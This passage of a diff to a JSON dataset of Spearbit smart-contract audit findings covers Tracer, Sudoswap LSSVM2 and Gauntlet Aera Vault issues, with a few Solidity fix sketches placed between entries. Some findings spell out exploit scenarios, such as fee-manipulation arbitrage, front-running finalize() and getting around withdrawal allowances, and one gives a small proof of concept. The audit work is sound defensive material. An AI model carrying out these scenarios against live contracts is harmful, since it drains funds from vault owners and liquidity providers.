from reverting because of an underflow error on uint256 duration = endTime - startTime;", "labels": [ "Spearbit", - "Tracer", - "Severity: Informational" + "Gauntlet", + "Severity: High Risk" ] }, { - "title": "Missing events for setInvariantCheck() and setAutoClaim() in PoolFactory", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "Events should be emitted for access-controlled critical functions, and functions that set protocol parameters or affect the protocol in significant ways.", + "title": "The vault manager has unchecked power to create arbitrage using setSwapFees", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "A previously known issue was that a malicious vault manager could arbitrage the vault as in the below scenario: 1. Set the swap fees to a high value by setSwapFee (10% is the maximum). 2. Wait for the market price to move against the spot price. 3. In the same transaction, reduce the swap fees to ~0 (0.0001% is the minimum) and arbitrage the vault. The proposed fix was to limit the percentage change of the swap fee to a maximum of MAXIMUM_SWAP_FEE_PERCENT_CHANGE each time. However, because there is no restriction on how many times the setSwapFee function can be called in a block or transaction, a malicious manager can still call it multiple times in the same transaction and eventually set the swap fee to the value they want.", "labels": [ "Spearbit", - "Tracer", - "Severity: Informational" + "Gauntlet", + "Severity: High Risk" ] },
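A minimal sketch of one possible fix (access control omitted; every name except MAXIMUM_SWAP_FEE_PERCENT_CHANGE is hypothetical): add a cooldown between calls so the bounded per-call change is also bounded per unit of time:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract SwapFeeCooldownSketch {
    uint256 public constant MAXIMUM_SWAP_FEE_PERCENT_CHANGE = 0.005e18; // hypothetical bound
    uint256 public constant SWAP_FEE_COOLDOWN = 1 hours;                // hypothetical delay

    uint256 public swapFee;
    uint256 public lastSwapFeeChange;

    function setSwapFee(uint256 newFee) external {
        // a second call in the same block/transaction now reverts
        require(block.timestamp >= lastSwapFeeChange + SWAP_FEE_COOLDOWN, "cooldown active");
        uint256 change = newFee > swapFee ? newFee - swapFee : swapFee - newFee;
        require(change <= MAXIMUM_SWAP_FEE_PERCENT_CHANGE, "change too large");
        lastSwapFeeChange = block.timestamp;
        swapFee = newFee;
    }
}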
{ - "title": "Terminology used for tokens and oracles is not clear and consistent across codebase", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "Different terms are used across the codebase to address the different tokens, leading to some mixups. Assuming a pair BTC/USDC is being tracked with WETH as collateral, we think the following definitions apply: collateral token == quote token == settlement token == WETH pool token == long token + short token == long BTC/USDC + short BTC/USDC As for the oracles: settlementEthOracle is the oracle for settlement in ETH (WETH/ETH) oracleWrapper is the oracle for BTC/USDC Here is an example of a mixup: The comments in getMint() and getBurn() are different while their result should be similar. It seems the comment on getBurn() has reversed settlement and pool tokens. * @notice Calculates the number of pool tokens to mint, given some settlement token amount and a price ... * @return Quantity of pool tokens to mint ... function getMint(bytes16 price, uint256 amount) public pure returns (uint256) { ... } * @notice Calculate the number of settlement tokens to burn, based on a price and an amount of pool tokens // settlement & pool seem reversed ... * @return Quantity of pool tokens to burn ... function getBurn(bytes16 price, uint256 amount) public pure returns (uint256) { ... } The settlementTokenPrice variable in keeperGas() is misleading, and it is not clear whether it is ETH per settlement token or settlement tokens per ETH. contract PoolKeeper is IPoolKeeper, Ownable { function keeperGas(..) public view returns (uint256) { int256 settlementTokenPrice = IOracleWrapper(ILeveragedPool(_pool).settlementEthOracle()).getPrice(); ... } }", + "title": "Implement a function to claim liquidity mining rewards", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "Balancer offers a liquidity mining rewards distribution for liquidity providers. Liquidity Mining distributions are available to claim weekly through the MerkleOrchard contract. Liquidity Providers can claim tokens from this contract by submitting claims to the tokens. These claims are checked against a Merkle root of the accrued token balances, which are stored in a Merkle tree. Claiming through the MerkleOrchard is much more gas-efficient than the previous generation of claiming contracts, especially when claiming multiple weeks of rewards and when claiming multiple tokens. The AeraVault is itself the only liquidity provider of the Balancer pool deployed, so each week it's entitled to claim those rewards. Currently, those rewards cannot be claimed because the AeraVault is missing an implementation to interact with the MerkleOrchard contract, causing all rewards (BAL + other tokens) to remain in the MerkleOrchard forever.", "labels": [ "Spearbit", - "Tracer", - "Severity: Informational" + "Gauntlet", + "Severity: High Risk" ] }, { - "title": "Incorrect NatSpec and comments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "Some NatSpec documentation and comments contain incorrect or unclear information. In PoolSwapLibrary.sol#L283-L293, the NatSpec for the isBeforeFrontRunningInterval() function refers to uncommitment, which is no longer supported. * @notice Returns true if the given timestamp is BEFORE the frontRunningInterval starts, * which is allowed for uncommitment. function isBeforeFrontRunningInterval(...) In LeveragedPool.sol#L511 the NatSpec for the withdrawQuote() function notes that the pool should not be paused while the require checks that it is paused. * @dev Pool must not be paused function withdrawQuote() ... { require(paused, \"Pool is live\"); In LeveragedPool.sol#L47 the comment is unclear, as it references a singular update interval but the mapping points to arrays. // The most recent update interval in which a user committed mapping(address => uint256[]) public unAggregatedCommitments; In PoolToken.sol#L16-L23 both the order and the meaning of the documentation are wrong. The @param lines order should be switched.
@param amount Pool tokens to burn should be replaced with @param amount Pool tokens to mint. @param account Account to burn pool tokens to should be replaced with @param account Account to mint pool tokens to. /** * @notice Mints pool tokens - * @param amount Pool tokens to burn - * @param account Account to burn pool tokens to + * @param account Account to mint pool tokens to + * @param amount Pool tokens to mint */ function mint(address account, uint256 amount) external override onlyOwner { ... } In PoolToken.sol#L25-L32 the order of the @param lines is reversed. /** * @notice Burns pool tokens - * @param amount Pool tokens to burn - * @param account Account to burn pool tokens from + * @param account Account to burn pool tokens from + * @param amount Pool tokens to burn */ function burn(address account, uint256 amount) external override onlyOwner { ... } In PoolFactory.sol#L176-L203 the NatSpec @param for poolOwner is missing. It would also be suggested to change the parameter name from poolOwner to pool, since the parameter received from deployPool is the address of the pool and not the owner of the pool. /** * @notice Deploy a contract for pool tokens + * @param pool The pool address, owner of the Pool Token * @param leverage Amount of leverage for pool * @param deploymentParameters Deployment parameters for parent function * @param direction Long or short token, L- or S- * @return Address of the pool token */ function deployPairToken( - address poolOwner, + address pool, string memory leverage, PoolDeployment memory deploymentParameters, string memory direction ) internal returns (address) { ... - pairToken.initialize(poolOwner, poolNameAndSymbol, poolNameAndSymbol, settlementDecimals); + pairToken.initialize(pool, poolNameAndSymbol, poolNameAndSymbol, settlementDecimals); ... } In PoolSwapLibrary.sol#L433-L454 the comments for two of the parameters of function getMintWithBurns() are reversed. * @param amount ... * @param oppositePrice ... ... function getMintWithBurns( ... bytes16 oppositePrice, uint256 amount, ... ) public pure returns (uint256) { ... In ERC20_Cloneable.sol#L46-L49 a comment at the constructor of the ERC20_Cloneable contract mentions a default value of 18 for decimals. However, it doesn't use this default value, but the supplied parameter. Moreover, a comment at the constructor of the ERC20_Cloneable contract mentions _setupDecimals. This is probably a reference to an old version of the OpenZeppelin ERC20 contracts and no longer relevant. Additionally, the comments say the values are immutable, but they are set in the initialize() function. @dev Sets the values for {name} and {symbol}, initializes {decimals} with * a default value of 18. * To select a different value for {decimals}, use {_setupDecimals}. * * All three of these values are immutable: they can only be set once during construction. ... constructor(string memory name_, string memory symbol_, uint8 decimals_) ERC20(name_, symbol_) { _decimals = decimals_; } function initialize(address _pool, string memory name_, string memory symbol_, uint8 decimals_)
external initializer { owner = _pool; _name = name_; _symbol = symbol_; _decimals = decimals_; }", + "title": "Owner can circumvent allowance() via enableTradingWithWeights()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The vault Owner can set arbitrary weights via disableTrading() and then call enableTradingWithWeights() to set the spot price and create arbitrage opportunities for himself. This way the allowance() checks in withdraw(), which limit the amount of funds an owner can withdraw, can be circumvented. Something similar can be done with enableTradingRiskingArbitrage() in combination with sufficient time. Also see the following issues: allowance() doesn't limit withdraw()s; enableTradingWithWeights allows the Treasury to change the pool's weights even if the swap is not disabled; Separation of concerns Owner and Manager. function disableTrading() ... onlyOwnerOrManager ... { setSwapEnabled(false); } function enableTradingWithWeights(uint256[] calldata weights) ... onlyOwner ... { ... pool.updateWeightsGradually(timestamp, timestamp, weights); setSwapEnabled(true); } function enableTradingRiskingArbitrage() ... onlyOwner ... { setSwapEnabled(true); }", "labels": [ "Spearbit", - "Tracer", - "Severity: Informational" + "Gauntlet", + "Severity: Medium Risk" ] }, { - "title": "Partial fills for buy orders in ERC1155 swaps will fail when pair has insufficient balance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Partial fills are currently supported for buy orders in VeryFastRouter.swap(). When _findMaxFillableAmtForBuy() determines numItemsToFill, it is not guaranteed that the underlying pair has so many items left to fill. While the ERC721 swap handles the scenario where the pair balance is less than numItemsToFill in the logic of _findAvailableIds() (maxIdsNeeded vs numIdsFound), the ERC1155 swap is missing a similar check and reduction of item numbers when required. Partial fills for buy orders in ERC1155 swaps will fail when the pair has a balance less than numItemsToFill as determined by _findMaxFillableAmtForBuy(). Partial filling, a key feature of VeryFastRouter, will then not work as expected and would lead to an early revert which defeats the purpose of swap().", + "title": "Front-running attacks on finalize could affect received token amounts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The returnFunds() function (called by finalize()) withdraws the entire holdings in the Balancer pool but does not allow the caller to specify and enforce a minimum amount of received tokens. Without such a check the finalize() function could be susceptible to a front-running attack. A potential exploit scenario looks as follows: 1. The notice period has passed and the Treasury calls finalize() on the Aera vault. Assume the Balancer pool contains 1 WETH and 3000 DAI, and that the WETH and DAI weights are both 0.5. 2. An attacker front-runs the Treasury's transaction and swaps in 3000 DAI to get 0.5 WETH from the pool. 3. As an unexpected result, the Treasury receives 0.5 WETH and 6000 DAI. Therefore an attacker can force the Treasury to accept the trade that they offer. Although the Treasury can execute a reverse trade on another market to recover the token amount and distribution, not every Treasury can execute such a trade (e.g., if a timelock controls it).
Notice that the attacker may not profit from the swap because of slippage, but they could be incentivized to perform such an attack if it causes considerable damage to the Treasury.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: High Risk" + "Gauntlet", + "Severity: Medium Risk" ] }, { - "title": "Function token() of cloneERC1155ERC20Pair() reads from wrong location", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function token() loads the token data from position 81. However, on ERC1155 pairs it should load it from position 93. Currently, it doesn't retrieve the right values and the code won't function correctly. LSSVMPair.sol: _factory := shr(0x60, calldataload(sub(calldatasize(), paramsLength))) LSSVMPair.sol: _bondingCurve := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), 20))) LSSVMPair.sol: _nft := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), 40))) LSSVMPair.sol: _poolType := shr(0xf8, calldataload(add(sub(calldatasize(), paramsLength), 60))) LSSVMPairERC1155.sol: id := calldataload(add(sub(calldatasize(), paramsLength), 61)) LSSVMPairERC721.sol: _propertyChecker := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), 61))) LSSVMPairERC20.sol: _token := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), 81))) function cloneERC1155ERC20Pair(... ) ... { assembly { ... mstore(add(ptr, 0x3e), shl(0x60, factory)) // position 0 - 20 bytes mstore(add(ptr, 0x52), shl(0x60, bondingCurve)) // position 20 - 20 bytes mstore(add(ptr, 0x66), shl(0x60, nft)) // position 40 - 20 bytes mstore8(add(ptr, 0x7a), poolType) // position 60 - 1 byte mstore(add(ptr, 0x7b), nftId) // position 61 - 32 bytes mstore(add(ptr, 0x9b), shl(0x60, token)) // position 93 - 20 bytes ... } }", + "title": "safeApprove in depositToken could revert for non-standard token like USDT", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "Some non-standard tokens like USDT will revert when a contract or a user tries to approve an allowance when the spender allowance has already been set to a non-zero value. In the current code we have not seen any real problem with this fact, because the amount retrieved via depositToken() is approved and sent to the Balancer pool via joinPool() and managePoolBalance(). Balancer transfers the same amount, lowering the approval to 0 again. However, if the approval is not lowered to exactly 0 (due to a rounding error or another unforeseen situation) then the next approval in depositToken() will fail (assuming a token like USDT is used), blocking all further deposits. Note: Set to medium risk because the probability of this happening is low but the impact would be high. We should also note that OpenZeppelin has officially deprecated the safeApprove function, suggesting the use of safeIncreaseAllowance and safeDecreaseAllowance instead.",
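A minimal sketch of the usual workaround (OpenZeppelin SafeERC20 from the 4.x line assumed; helper name hypothetical): reset the allowance to zero before setting the new value, so a leftover non-zero allowance can never brick deposits:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

contract ApproveResetSketch {
    using SafeERC20 for IERC20;

    function _approveExactly(IERC20 token, address spender, uint256 amount) internal {
        token.safeApprove(spender, 0);      // clear any leftover allowance first
        token.safeApprove(spender, amount); // USDT-style tokens accept 0 -> amount
    }
}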
"labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: High Risk" + "Gauntlet", + "Severity: Medium Risk" ] }, { - "title": "Switched order of update leads to incorrect partial fill calculations", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "In the binary search, the order of updating start and numItemsToFill is switched, with start being updated before numItemsToFill, which itself uses the value of start: start = (start + end)/2 + 1; numItemsToFill = (start + end)/2; This leads to incorrect partial fill calculations when the binary search recurses on the right half.", + "title": "Consult with Balancer team about best approach to add and remove funds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The Aera Vault uses the AssetManager functionality of the managePoolBalance() function to add and remove funds. The standard way to add and remove funds in Balancer is via joinPool() / exitPool(). Using the managePoolBalance() function might lead to unexpected behavior in the future. Additionally, this disables the capacity to implement the original intention of the AssetManager functionality, e.g. storing funds elsewhere to generate yield.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: High Risk" + "Gauntlet", + "Severity: Medium Risk" ] }, { - "title": "Swap functions with sell orders in LSSVMRouter will fail for property-check enforced pairs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Swap functions with sell orders in LSSVMRouter will revert for property-check enforced pairs. While VeryFastRouter's swap function supports sell orders specifying property check parameters for pairs enforcing them, none of the swap functions in LSSVMRouter support the same.", + "title": "Fee on transfer can block several functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "Some tokens have a fee on transfer, for example USDT. Usually such a fee is not enabled but it could be re-enabled at any time. With this fee enabled, the withdrawFromPool() function would receive slightly fewer tokens than the amounts requested from Balancer, causing the next safeTransfer() call to fail because there are not enough tokens inside the contract. This means withdraw() calls will fail. Functions deposit() and calculateAndDistributeManagerFees() can also fail because they have similar code. Note: The function returnFunds() is more robust and can handle this problem. Note: The problem can be alleviated by sending additional tokens directly to the Aera Vault contract to compensate for fees, lowering the severity of the problem to medium. function withdraw(uint256[] calldata amounts) ... { ... withdrawFromPool(amounts); // could get slightly less than amount with a fee on transfer ... for (uint256 i = 0; i < amounts.length; i++) { if (amounts[i] > 0) { tokens[i].safeTransfer(owner(), amounts[i]); // could revert if the full amounts[i] isn't available ... } ... } }",
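A minimal sketch of the balance-delta pattern that tolerates fee-on-transfer tokens (standalone, names hypothetical): forward what was actually received instead of the requested amount:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface IERC20 {
    function balanceOf(address account) external view returns (uint256);
    function transfer(address to, uint256 amount) external returns (bool);
}

contract BalanceDeltaSketch {
    // usage: record token.balanceOf(address(this)) before the pool withdrawal,
    // then call this helper; it transfers only the amount that actually arrived
    function _sweepReceived(IERC20 token, address to, uint256 balanceBefore) internal {
        uint256 received = token.balanceOf(address(this)) - balanceBefore;
        require(token.transfer(to, received), "transfer failed");
    }
}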
"labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: High Risk" + "Gauntlet", + "Severity: Medium Risk" ] }, { - "title": "pairTransferERC20From() only supports ERC721 NFTs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Function pairTransferERC20From(), which is present in both LSSVMRouter and VeryFastRouter, only checks for ERC721_ERC20. This means ERC1155 NFTs are not supported by the routers. The following code is present in both LSSVMRouter and VeryFastRouter. function pairTransferERC20From(...) ... { require(factory.isPair(msg.sender, variant), \"Not pair\"); ... require(variant == ILSSVMPairFactoryLike.PairVariant.ERC721_ERC20, \"Not ERC20 pair\"); ... }", + "title": "enableTradingWithWeights allows the Treasury to change the pool's weights even if the swap is not disabled", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "enableTradingWithWeights is a function that can only be called by the owner of the Aera Vault contract and that should be used only to re-enable the swap feature on the pool while updating token weights. The function does not verify whether the pool's swap feature is enabled; as a result, it allows the Treasury to act as the manager, who is the only actor allowed to change the pool weights. The function should add a check to ensure that it is only callable when the pool's swap is disabled.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: High Risk" + "Gauntlet", + "Severity: Medium Risk" ] }, { - "title": "Insufficient application of trading fee leads to 50% loss for LPs in swapTokenForAnyNFTs()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The protocol applies a trading fee of 2*tradeFee on NFT buys from pairs (to compensate for 0 fees on NFT sells as noted in the comment: \"// We pull twice the trade fee on buys but don't take trade fee on sells if assetRecipient is set\"). While this is enforced in LSSVMPairERC721.swapTokenForSpecificNFTs(), LSSVMPairERC1155.swapTokenForAnyNFTs() and LSSVMPairERC1155.swapTokenForSpecificNFTs() enforce a trading fee of only tradeFee (instead of 2*tradeFee). Affected LPs of pairs targeted by LSSVMPairERC1155.swapTokenForAnyNFTs() will unexpectedly lose 50% of the trade fees.", + "title": "AeraVault constructor is not checking all the input parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The Aera Vault constructor has the role of handling Balancer's ManagedPool deployment. The constructor should perform more user input validation, and the Gauntlet team should be aware of the possible edge cases that could happen given that the deployment of the Aera Vault is handled directly by the Treasury and not by the Gauntlet team itself. We are going to list all the worst-case scenarios that could happen given the premise that the deployments are handled by the Treasury. 1. factory could be a wrapper contract that will deploy a ManagedPool. This would mean that the deployer could pass correct parameters to the Aera Vault to pass these checks, but use custom and malicious parameters on the factory wrapper to deploy the real Balancer pool. 2. swapFeePercentage value is not checked.
On Balancer, the deployment will revert if the value is not inside the range >= 1e12 (0.0001%) and <= 1e17 (10% - this fits in 64 bits). Without any check, the Gauntlet team implicitly accepts Balancer's swap fee requirements. 3. manager_ is not checked. They could set the manager as the Treasury (owner of the vault) itself. This would give the Treasury the full power to manage the Vault. At least these values should be checked: address(0), address(this) or owner(). The same checks should also be done in the setManager() function. 4. validator_ could be set to a custom contract that will give full allowances to the Treasury. This would make withdraw() act like finalize(), allowing all the funds to be withdrawn from the vault/pool. 5. noticePeriod_ has only a max value check. The Gauntlet team explained that a time delay between the initialization of the finalize process and the actual finalize is needed to prevent the Treasury from being able to instantly withdraw all the funds. Not having a min value check allows the Treasury to set the value to 0, so there would be no delay between initiateFinalization() and finalize() because noticeTimeoutAt == block.timestamp. 6. managementFee_ has no minimum value check. This would allow the Treasury to not pay the manager because the managerFeeIndex would always be 0. 7. description_ can be empty. From the Specification PDF, the description of the vault has the role of describing the vault purpose and modelling assumptions for differentiating between vaults. Being empty could lead to a bad UX for external services that need to differentiate different vaults. These are all the checks that are done directly by Balancer during deployment via the Pool Factory: BasePool constructor#L94-L95: min and max number of tokens. BasePool constructor#L102: token array is sorted following the Balancer specification (sorted by token address). BasePool constructor calling _setSwapFeePercentage: min and max value for swapFeePercentage. BasePool constructor calling vault.registerTokens: token address uniqueness (can't have the same token twice in the pool); following the path from BasePool through vault.registerTokens into MinimalSwapInfoPoolsBalance._registerMinimalSwapInfoPoolTokens, it also checks that token != IERC20(0). ManagedPool constructor calling _startGradualWeightChange: checks the min value of each weight and that the total sum of the weights is equal to 100%. _startGradualWeightChange internally checks that endWeight >= WeightedMath._MIN_WEIGHT and normalizedSum == FixedPoint.ONE.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: High Risk" + "Gauntlet", + "Severity: Medium Risk" ] }, { - "title": "Royalty not always being taken into account leads to incorrect protocol accounting", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function getSellNFTQuoteWithRoyalties() is similar to getSellNFTQuote(), except that it also takes the royalties into account. When the function robustSwapNFTsForToken() of the LSSVMRouter is called, it first calls getSellNFTQuote() and checks that a sufficient amount of tokens will be received. Then it calls swapNFTsForToken() with 0 as minExpectedTokenOutput, so it will accept any amount of tokens. swapNFTsForToken() does subtract the royalties, which will result in a lower amount of tokens received and might not be enough to satisfy the requirements of the seller.
The same happens in robustSwapETHForSpecificNFTsAndNFTsToToken and robustSwapERC20ForSpecificNFTsAndNFTsToToken. Note: Function getSellNFTQuote() of StandardSettings.sol also uses getSellNFTQuote(). However there it is compared to the results of getBuyInfo(); so this is ok as both don't take the royalties into account. Note: getNFTQuoteForSellOrderWithPartialFill() also has to take royalties into account. 8 function getSellNFTQuote(uint256 numNFTs) ... { ( (...., outputAmount, ) = bondingCurve().getSellInfo(...); } function getSellNFTQuoteWithRoyalties(uint256 assetId, uint256 numNFTs) ... { (..., outputAmount, ... ) = bondingCurve().getSellInfo(...); (,, uint256 royaltyTotal) = _calculateRoyaltiesView(assetId, outputAmount); ... outputAmount -= royaltyTotal; } function robustSwapNFTsForToken(...) ... { ... (error,,, pairOutput,) = swapList[i].swapInfo.pair.getSellNFTQuote(swapList[i].swapInfo.nftIds.length); ... if (pairOutput >= swapList[i].minOutput) { ....swapNFTsForToken(..., 0, ...); } ... ,! } function swapNFTsForToken(...) ... { ... (protocolFee, outputAmount) = _calculateSellInfoAndUpdatePoolParams(numNFTs[0], _bondingCurve, _factory); (... royaltyTotal) = _calculateRoyalties(nftId(), outputAmount); ... outputAmount -= royaltyTotal; ... _sendTokenOutput(tokenRecipient, outputAmount); ,! }", + "title": "Possible mismatch between Validator.count and AeraVault assets count", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "A weak connection between WithdrawalValidator and Aera Vault could lead to the inability to withdraw from a Vault. Consider the following scenario: The Validator is deployed with a tokenCount smaller than Vault.getTokens().length. Inside the withdraw() function we reference the following code block: uint256[] memory allowances = validator.allowance(); uint256[] memory weights = getNormalizedWeights(); uint256[] memory newWeights = new uint256[](tokens.length); for (uint256 i = 0; i < tokens.length; i++) { if (amounts[i] > holdings[i] || amounts[i] > allowances[i]) { revert Aera__AmountExceedAvailable( address(tokens[i]), amounts[i], holdings[i].min(allowances[i]) ); } } A scenario where allowances.length < tokens.length would cause this function to revert with an Index out of bounds error. The only way for the Treasury to withdraw funds would be via the finalize() method which has a time delay.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: High Risk" + "Gauntlet", + "Severity: Medium Risk" ] }, { - "title": "Error return codes of getBuyInfo() and getSellInfo() are sometimes ignored", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The functions getBuyInfo() and getSellInfo() return an error code when they detect an error. The rest of the returned parameters then have an unusable/invalid value (0). However, some callers of these functions ignore the error code and continue processing with the other unusable/invalid values. The functions getBuyNFTQuote(), getSellNFTQuote() and getSellNFTQuoteWithRoyalties() pass through the error code, so their callers have to check the error codes too. 9 function getBuyInfo(...) ... returns (CurveErrorCodes.Error error, ... ) { } function getSellInfo(...) ... returns (CurveErrorCodes.Error error, ... ) { } function getBuyNFTQuote(...) ... returns (CurveErrorCodes.Error error, ... ) { (error, ... ) = bondingCurve().getBuyInfo(...); } function getSellNFTQuote(...) ...
returns (CurveErrorCodes.Error error, ... ) { (error, ... ) = bondingCurve().getSellInfo(...); } function getSellNFTQuoteWithRoyalties(...) ... returns (CurveErrorCodes.Error error, ... ) { (error, ... ) = bondingCurve().getSellInfo(...); }", + "title": "Ensure vaults deployment integrity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The Treasury could, on purpose or by accident, deploy a slightly different version of the contract and introduce bugs or backdoors. This might not be recognized by the parties taking on Manager responsibilities (usually Gauntlet will be involved here).", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: High Risk" + "Gauntlet", + "Severity: Low Risk" ] }, { - "title": "changeSpotPriceAndDelta() only uses ERC721 version of balanceOf()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function changeSpotPriceAndDelta() uses balanceOf() with one parameter. This is the ERC721 variant. In order to support ERC1155, a second parameter of the NFT id has to be supplied. function changeSpotPriceAndDelta(address pairAddress, ...) public { ... if ((newPriceToBuyFromPair < priceToBuyFromPair) && pair.nft().balanceOf(pairAddress) >= 1) { ... } }", + "title": "Frequent calling of calculateAndDistributeManagerFees() lowers fees", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "Via calculateAndDistributeManagerFees() a percentage of the Pool is subtracted and sent to the Manager. If this function is called too frequently, the Manager's fees will be lower. For example: If he calls it twice, taking 1% each time, he actually gets 1% + 1% * (100% - 1%) = 1.99%. If he waits until he has earned 2%, he actually gets 2%, which is slightly more than 1.99%. If called very frequently the fees go to 0 (especially taking into account the rounding down); however, the gas cost would be very high. The Manager can (accidentally) do this by calling claimManagerFees(). The Owner can (accidentally or on purpose, e.g. using a 0 balance change) do this by calling deposit(), withdraw() or setManager(). Note: Rounding errors make this slightly worse. Also see the following issue: Possible rounding down of fees. function claimManagerFees() ... { calculateAndDistributeManagerFees(); // get a percentage of the Pool }", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: High Risk" + "Gauntlet", + "Severity: Low Risk" ] }, { - "title": "_pullTokenInputAndPayProtocolFee() doesn't check that tokens are received", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function _pullTokenInputAndPayProtocolFee() doesn't verify that it actually received the to- kens after doing safeTransferFrom(). This can be an issue with fee on transfer tokens. This is also an issue with (accidentally) non-existing tokens, as safeTransferFrom() won't revert on that, see POC below. Note: also see issue \"Malicious router mitigation may break for deflationary tokens\". function _pullTokenInputAndPayProtocolFee(...) ... { ... _token.safeTransferFrom(msg.sender, _assetRecipient, saleAmount); ... } Proof Of Concept: // SPDX-License-Identifier: MIT pragma solidity ^0.8.18; import \"hardhat/console.sol\"; import {ERC20} from \"https://raw.githubusercontent.com/transmissions11/solmate/main/src/tokens/ERC20.sol\"; ,!
import {SafeTransferLib} from \"https://raw.githubusercontent.com/transmissions11/solmate/main/src/utils/SafeTransferLib.sol\"; ,! contract test { using SafeTransferLib for ERC20; function t() public { ERC20 _token = ERC20(address(1)); _token.safeTransferFrom(msg.sender, address(0), 100); console.log(\"after safeTransferFrom\"); } }", + "title": "OpenZeppelin best practices", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The Aera Vault uses OpenZeppelin release 4.3.2, which is copied into their GitHub repository. The current release of OpenZeppelin is 4.6.0 and includes several updates and security fixes. The copies of the OpenZeppelin files are also (manually) changed to adapt the import paths, which carries the risk of a mistake being made in the process. import \"./dependencies/openzeppelin/SafeERC20.sol\"; import \"./dependencies/openzeppelin/IERC20.sol\"; import \"./dependencies/openzeppelin/IERC165.sol\"; import \"./dependencies/openzeppelin/Ownable.sol\"; import \"./dependencies/openzeppelin/ReentrancyGuard.sol\"; import \"./dependencies/openzeppelin/Math.sol\"; import \"./dependencies/openzeppelin/SafeCast.sol\"; import \"./dependencies/openzeppelin/ERC165Checker.sol\";", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Low Risk" ] }, { - "title": "A malicious settings contract can call onOwnershipTransferred() to take over pair", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function onOwnershipTransferred() can be called from a pair via call(). This can be done It can either before transferOwnership() or after it. If it is called before then it updates the AssetRecipient. only be called after the transferOwnership() when an alternative (malicious) settings contract is used. In that situation pairInfos[] is overwritten and the original owner is lost; so effectively the pair can be taken over. Note: if the settings contract is malicious then there are different ways to take over the pair, but using this approach the vulnerabilities can be hidden. 11 function onOwnershipTransferred(address prevOwner, bytes memory) public payable { ILSSVMPair pair = ILSSVMPair(msg.sender); require(pair.poolType() == ILSSVMPair.PoolType.TRADE, \"Only TRADE pairs\"); ... }", + "title": "Possible rounding down of fees", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "If a token has only a few decimals then fees could be rounded down to 0, especially if the 